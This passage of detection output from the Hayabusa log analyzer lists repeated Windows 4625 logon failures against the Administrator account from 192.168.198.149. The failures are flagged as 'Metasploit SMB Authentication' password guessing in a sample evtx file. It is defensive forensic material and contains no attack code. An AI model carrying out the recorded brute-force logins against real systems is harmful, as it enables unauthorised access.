SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.091 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: N4FLUvawWPVqdLaD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.091 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KN0EeUzxSZy5l7J4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.136 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.169 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: l8FjH0QHqromIYWf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.169 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.217 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: fhlF37S1wNupiX5O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.217 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.262 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j19XhmSXK526I8kf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.262 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IRcppJXDNNfKuvdc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.297 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.343 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E0FoGAIAK2FV3zCJ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.343 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.393 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uYWIk76XIksgN3sE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.393 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.444 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3FEop7o3SOolNvKs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.444 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cMGEM3ql9uov7zCP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.484 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EFPUA4pUPaLrkr1I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.520 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.551 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b7IeJU89jxitz407 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.551 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.590 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Wqj9nXRaDpwCJZO3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.590 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.631 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: bl0d61v2Ux7cNv4r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.631 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.663 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8LxTa5lyutrIB2cd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.663 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LPCy11e3YxcCloSH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.684 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mj07WKc4aQqPC0Te : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.720 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: T2M3v4TsQul5R4sj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.752 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I67uBcH52tgLzhVB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.835 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2hsth68FDJ4F10H6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.835 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aDoHrfWlaWZ5GbWV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.929 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.972 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uliC5Wd7uZR3fIBc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.972 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Unknown Reason,User: Administrator : Type: 3 : Workstation: Xhg4hg4XDFaXsJRe : IP Address: 192.168.198.149 : SubStatus: 0xc0000072 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-UnknownError.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.000 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.042 
+09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Unknown Reason,User: Administrator : Type: 3 : Workstation: ZrSGxwUyV6gCUPeb : IP Address: 192.168.198.149 : SubStatus: 0xc0000072 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-UnknownError.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.042 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.179 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XUBgTr05x3djEYdM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.179 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.219 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 40PhGU4ZXu7uihop : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.219 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.335 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1DJ9r72hXZH9rEkb : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.335 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: khy2BeyBb9wq00f7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.397 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.462 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1cDckicL7IMrO7OQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.462 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.513 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dEEkvfVd3FCap6fa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.513 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.545 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JGFSyHQ0ZNWofxzE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.545 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ItOZqZSDTrdWpkbp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.576 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.611 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NhNdf5lHfrHKSCXq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.611 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.646 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: xg05F6tdf3kR9kdP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.646 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 70rRbaC6L6SzT15q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.693 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.735 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HnJyN8wF21ff2L1e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.735 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.769 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MUZHZJMQznj6GBqg : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.769 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.804 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: P9h52ZKMbXLuFvUV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.804 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.839 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n95RJvcQnFrAG2iX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.839 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.883 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xI23nmysFlr1pvVf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.883 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.916 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nVsjcTxDdZbzkmMx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.916 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.955 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mMuWatQuNBh9UKdR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.955 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.992 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BfC3JZ3awqFDNQbm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.992 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.028 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 337h8PHN6Axi0iaY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.028 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.071 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qGQpWOuzgETfxTgJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.071 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.108 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oFjlyMAJMI2zIC8w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.108 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:09.144 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7exAVz3PlzJQ6Wcw : IP Address: 192.168.198.149 : AuthPackage: 
